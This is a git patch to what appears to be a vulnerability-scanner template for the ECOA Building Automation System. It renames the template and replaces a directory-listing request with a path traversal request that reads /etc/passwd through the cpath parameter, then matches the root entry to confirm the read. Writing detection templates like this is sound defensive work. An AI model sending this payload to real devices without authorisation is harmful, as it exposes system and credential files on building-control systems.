From 2e7e35eb70d295698132a42ac2b297b9d5be9e5c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 11:22:48 +0530 Subject: [PATCH] Update and rename ecoa-building-directory-traversal.yaml to ecoa-building-lfi.yaml --- ...ory-traversal.yaml => ecoa-building-lfi.yaml} | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) rename vulnerabilities/other/{ecoa-building-directory-traversal.yaml => ecoa-building-lfi.yaml} (67%) diff --git a/vulnerabilities/other/ecoa-building-directory-traversal.yaml b/vulnerabilities/other/ecoa-building-lfi.yaml similarity index 67% rename from vulnerabilities/other/ecoa-building-directory-traversal.yaml rename to vulnerabilities/other/ecoa-building-lfi.yaml index 0fa43d3146..fcaa63183d 100644 --- a/vulnerabilities/other/ecoa-building-directory-traversal.yaml +++ b/vulnerabilities/other/ecoa-building-lfi.yaml @@ -1,4 +1,4 @@ -id: ecoa-building-directory-traversal +id: ecoa-building-lfi info: name: ECOA Building Automation System - Directory Traversal Content Disclosure @@ -6,18 +6,16 @@ info: severity: high description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - tags: ecoa,traversal + tags: ecoa,lfi requests: - raw: - | - GET /fmangersub?cpath=/ HTTP/1.1 + GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} matchers: - - type: word - words: - - "bacevent.elf" - - "redown.elf" - - "system.bin" - condition: and + - type: regex + regex: + - "root:.*:0:0:" + part: body